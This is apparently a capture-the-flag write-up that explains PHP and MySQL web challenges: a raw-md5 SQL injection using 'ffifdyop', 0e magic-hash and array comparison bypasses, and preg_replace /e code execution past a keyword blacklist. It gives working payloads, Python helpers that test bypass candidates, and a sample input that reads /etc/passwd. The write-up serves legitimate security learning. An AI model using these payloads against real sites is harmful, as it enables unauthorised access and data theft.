title: Problem-solving notes
categories:
  - web
abbrlink: 2701
date: YYYY-MM-DD HH:mm:ss
tags:
  - web
[BJDCTF 2020]easy_md5
Capturing the request with Burp Suite and resending it reveals a hint in the response:

```
hint:select * from 'admin' where password=md5($pass,true)
```
The breakthrough point is how md5() is used.

When the second argument (raw_output) is true, md5() returns the 16-byte digest as raw binary instead of the usual 32-character hex string, and that binary is concatenated straight into the query.

If the raw digest, read as a string, starts with `'or'` followed by some other bytes, the concatenated SQL becomes

```
select * from 'admin' where password=''or'balabala'
```

When the string after `or` evaluates to true, this is a universal password and the SQL injection succeeds.
Here we need to know a MySQL feature.

When a string is used in a boolean context, MySQL implicitly converts it to a number by taking its leading numeric prefix (a string with no leading digits becomes 0). A non-zero result is true, so a string after `or` that starts with a non-zero digit makes the condition true:

```
or'<digit>+anything'
e.g.
select * from `admin` where password=''or'1abcdefg' ---> True
select * from `admin` where password=''or'0abcdefg' ---> False
select * from `admin` where password=''or'1'        ---> True
select * from `admin` where password=''or'2'        ---> True
select * from `admin` where password=''or'0'        ---> False
```

As long as the numeric prefix of the string after `or` is non-zero, the condition returns true. This is our breakthrough point (note from the examples that a leading `0` or a leading letter converts to 0 and is false).
The most commonly used string is ffifdyop. md5("ffifdyop") = 276f722736c95d99e921722cf9ed621c, and when raw_output is true the first five bytes 27 6f 72 27 36 are the characters `'or'6`, so the query becomes `password=''or'6<garbage>'` and `'6...'` converts to 6, which is true.

How ffifdyop works: https://www.cnblogs.com/redfish404/articles/17878453.html

So just submit ffifdyop as the password.
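To check the two claims above offline (the MySQL string-to-number rule and the `'or'6` prefix of the raw digest of ffifdyop), here is an added Python example; it is not part of the original writeup. The query template is copied from the hint; `mysql_string_truthiness` is an assumed model of MySQL's implicit cast covering only integer and decimal prefixes, which is all the injection argument needs.

```python
# Added example (not from the original writeup): why ffifdyop works against
# password=md5($pass,true). Python 3, standard library only.
import hashlib
import re

# The query shape from the challenge hint; the raw digest is substituted in.
QUERY_TEMPLATE = "select * from 'admin' where password='{}'"

# Assumed model of MySQL's string->number cast: optional leading whitespace,
# optional sign, then an integer or decimal prefix. Exponent forms are ignored.
_NUM_PREFIX = re.compile(r"^[ \t]*[+-]?(\d+\.?\d*|\.\d+)")


def raw_md5(password: str) -> bytes:
    """PHP md5($pass, true): the 16-byte binary digest, not the hex string."""
    return hashlib.md5(password.encode()).digest()


def build_query(password: str) -> str:
    """Concatenate the raw digest into the query the way the challenge does.

    latin-1 maps every byte to exactly one character, so the 16 bytes are
    shown as-is without any decoding error.
    """
    return QUERY_TEMPLATE.format(raw_md5(password).decode("latin-1"))


def mysql_string_truthiness(s: str) -> bool:
    """Emulate MySQL evaluating a string in a boolean context.

    '1abc' -> 1 -> true, '0abc' -> 0 -> false, 'abc' -> 0 -> false.
    """
    m = _NUM_PREFIX.match(s)
    return bool(m) and float(m.group(0)) != 0.0


def injection_succeeds(password: str) -> bool:
    """True if md5($pass, true) turns the WHERE clause into ''or'<truthy>'."""
    raw = raw_md5(password).decode("latin-1")
    if not raw.startswith("'or'"):
        return False
    # The remaining bytes become the right operand of OR, up to the closing
    # quote the server appends. A second quote inside them would break the
    # statement instead, so require that there is none.
    operand = raw[4:]
    if "'" in operand:
        return False
    return mysql_string_truthiness(operand)


if __name__ == "__main__":
    print(raw_md5("ffifdyop").hex())
    print(build_query("ffifdyop"))
    print("universal password:", injection_succeeds("ffifdyop"))
```

`injection_succeeds` can be pointed at a wordlist to find other candidates, but the known one is enough here: the digest of ffifdyop contains exactly two 0x27 bytes, the ones forming `'or'`.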
Viewing the page source gives:

```php
<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    header('Location: levell14.php');
-->
```
This is an MD5 loose comparison (==).

When both MD5 hex digests have the form `0e` followed only by digits, PHP treats them as numeric strings in scientific notation; both evaluate to 0, so the comparison returns true even though the strings differ. (PHP 8 still compares two numeric strings numerically, so this particular trick survives; what PHP 8 changed is comparison of a numeric string with a non-numeric one.)
Known strings whose MD5 is of that form:

```
s878926199a   0e545993274517709034328855841020
s155964671a   0e342768416822451524974117254469
s214587387a   0e848240448830537924465865611904
s1091221200a  0e940624217856561557816327384675
s1885207154a  0e509367213418206700842008763514
s1502113478a  0e861580163291561247404381396064
s1836677006a  0e481036490867661113260034900752
s1184209335a  0e072485820392773389523109082030
s1665632922a  0e731198061491163073197128363787
s532378020a   0e220463095855511507588041205815
```
payload:
?a=s878926199a&b=s1665632922a
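As an added check (not part of the original writeup), the following Python verifies that every string in the list above really hashes to `0e<digits>` and emulates PHP's `==` on two strings, so the `$a != $b && md5($a) == md5($b)` condition can be reproduced offline. The numeric-string regex is an assumed approximation of PHP's rule (sign, digits, optional fraction and exponent, surrounding whitespace); it is exact for the `0e...` digests that matter here.

```python
# Added example (not from the original writeup): "0e" magic hashes and
# PHP loose comparison. Python 3, standard library only.
import hashlib
import re

# Strings from the list above; each md5 hex digest is 0e followed by digits only.
MAGIC = ["s878926199a", "s155964671a", "s214587387a", "s1091221200a",
         "s1885207154a", "s1502113478a", "s1836677006a", "s1184209335a",
         "s1665632922a", "s532378020a"]

# Assumed model of a PHP numeric string (whitespace, sign, digits, fraction,
# exponent). A hex digest matches only when it is 0e<digits>.
_PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def md5_hex(s: str) -> str:
    """PHP md5($s) with the default (hex) output."""
    return hashlib.md5(s.encode()).hexdigest()


def is_zero_e_hash(h: str) -> bool:
    """True if PHP would read the digest as the number 0 * 10^n."""
    return re.fullmatch(r"0e\d+", h) is not None


def php_loose_eq(a: str, b: str) -> bool:
    """Emulate PHP's == on two strings: numeric strings compare as numbers,
    anything else compares byte-wise. PHP 8 keeps this rule for two numeric
    strings, which is why 0e digests still collide there."""
    if _PHP_NUMERIC.match(a) and _PHP_NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def passes_level(a: str, b: str) -> bool:
    """The challenge condition: $a != $b && md5($a) == md5($b)."""
    return not php_loose_eq(a, b) and php_loose_eq(md5_hex(a), md5_hex(b))


def verify_magic_list() -> list:
    """Return the entries of MAGIC whose digest is NOT a 0e hash (expect none)."""
    return [m for m in MAGIC if not is_zero_e_hash(md5_hex(m))]


if __name__ == "__main__":
    print("bad entries:", verify_magic_list())
    print("payload works:", passes_level("s878926199a", "s1665632922a"))
```

Any two distinct entries of `MAGIC` work as `a` and `b`; pairing a magic string with a normal one fails because a digest such as `21232f...` is not a numeric string and therefore compares byte-wise.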
The response is the next level's source:

```php
<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}
```
This one exploits MD5 strict comparison (===) with arrays.

md5() cannot hash an array: in PHP 7 and earlier it emits a warning and returns null, so two different arrays both "hash" to null and `null === null` is true, while the arrays themselves are different and satisfy `!==`. (In PHP 8 md5() on an array throws a TypeError instead, so this trick needs PHP 7 or earlier.)

So the payload (POST body) is:

```
param1[]=1&param2[]=2
```

Reference: md5 and sha1 comparison vulnerabilities
2024 H&NCTF (Please_RCE_Me)

```php
<?php
if($_GET['moran'] === 'flag'){
    highlight_file(__FILE__);
    if(isset($_POST['task'])&&isset($_POST['flag'])){
        $str1 = $_POST['task'];
        $str2 = $_POST['flag'];
        if(preg_match('/system|eval|assert|call|create|preg|sort|{|}|filter|exec|passthru|proc|open|echo|`| |\.|include|require|flag/i',$str1) || strlen($str2) != 19 || preg_match('/please_give_me_flag/',$str2)){
            die('hacker!');
        }else{
            preg_replace("/please_give_me_flag/ei",$_POST['task'],$_POST['flag']);
        }
    }
}else{
    echo "moran want a flag.</br>(?moran=flag)";
}
```
flag must be exactly 19 characters long and must still match please_give_me_flag for the preg_replace to fire, yet the case-sensitive preg_match on it must fail. Since the preg_replace pattern uses /i, changing the case of one letter gets around the check: flag=please_give_me_flaG.

For task, the blacklist obviously filters most of the common command-execution functions (and also spaces, dots, braces, backticks and the word flag). The /e modifier makes preg_replace evaluate the replacement as PHP code, so whatever survives the blacklist is executed (this modifier was removed in PHP 7.0, so the challenge runs on PHP 5). Some file-reading functions worth considering:

1. readfile
2. show_source (prints the source of the current file, or the text content of a file)
3. highlight_file
4. file_get_contents
5. Encoding, to get around blocked characters
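Before sending anything, it helps to reproduce the three server-side checks locally so that candidate task and flag values can be tested against the blacklist offline. The following Python is an added example, not part of the original writeup or the challenge; it models only the checks (blacklist, strlen, case-sensitive match and the /i match that triggers preg_replace), not the /e evaluation itself. The candidate payloads in the test are constructed for illustration and are only shown to pass or fail the filter.

```python
# Added example (not from the original writeup): the Please_RCE_Me gate,
# re-implemented so candidate inputs can be checked offline. Python 3 only.
import re

# The PCRE blacklist from the challenge, with { and } escaped for Python's re.
TASK_BLACKLIST = re.compile(
    r"system|eval|assert|call|create|preg|sort|\{|\}|filter|exec|passthru|"
    r"proc|open|echo|`| |\.|include|require|flag",
    re.I,
)
FLAG_EXACT = re.compile(r"please_give_me_flag")          # case-sensitive preg_match
FLAG_REPLACE = re.compile(r"please_give_me_flag", re.I)  # the /ei pattern


def passes_gate(task: str, flag: str) -> bool:
    """True if the server reaches preg_replace instead of die('hacker!')."""
    if TASK_BLACKLIST.search(task):
        return False
    if len(flag.encode()) != 19:   # PHP strlen counts bytes
        return False
    if FLAG_EXACT.search(flag):
        return False
    return True


def replacement_fires(flag: str) -> bool:
    """True if the /i pattern matches, i.e. task would actually be evaluated."""
    return FLAG_REPLACE.search(flag) is not None


def blocked_tokens(task: str) -> list:
    """Which blacklist entries a candidate task trips, for debugging a payload."""
    return sorted({m.group(0).lower() for m in TASK_BLACKLIST.finditer(task)})


def would_execute(task: str, flag: str) -> bool:
    """Full condition: gate passed and the replacement actually runs."""
    return passes_gate(task, flag) and replacement_fires(flag)


if __name__ == "__main__":
    # Constructed candidates, only to illustrate the filter.
    for task in ["system('ls')", "readfile('/flag')", "show_source('/etc/passwd')"]:
        print(task, "->", blocked_tokens(task) or "passes blacklist")
    print("flaG variant executes:", would_execute("show_source('/etc/passwd')", "please_give_me_flaG"))
```

`blocked_tokens` is the useful part in practice: it shows exactly which alternative of the blacklist a payload hit, so the next attempt can target that character or keyword rather than guessing.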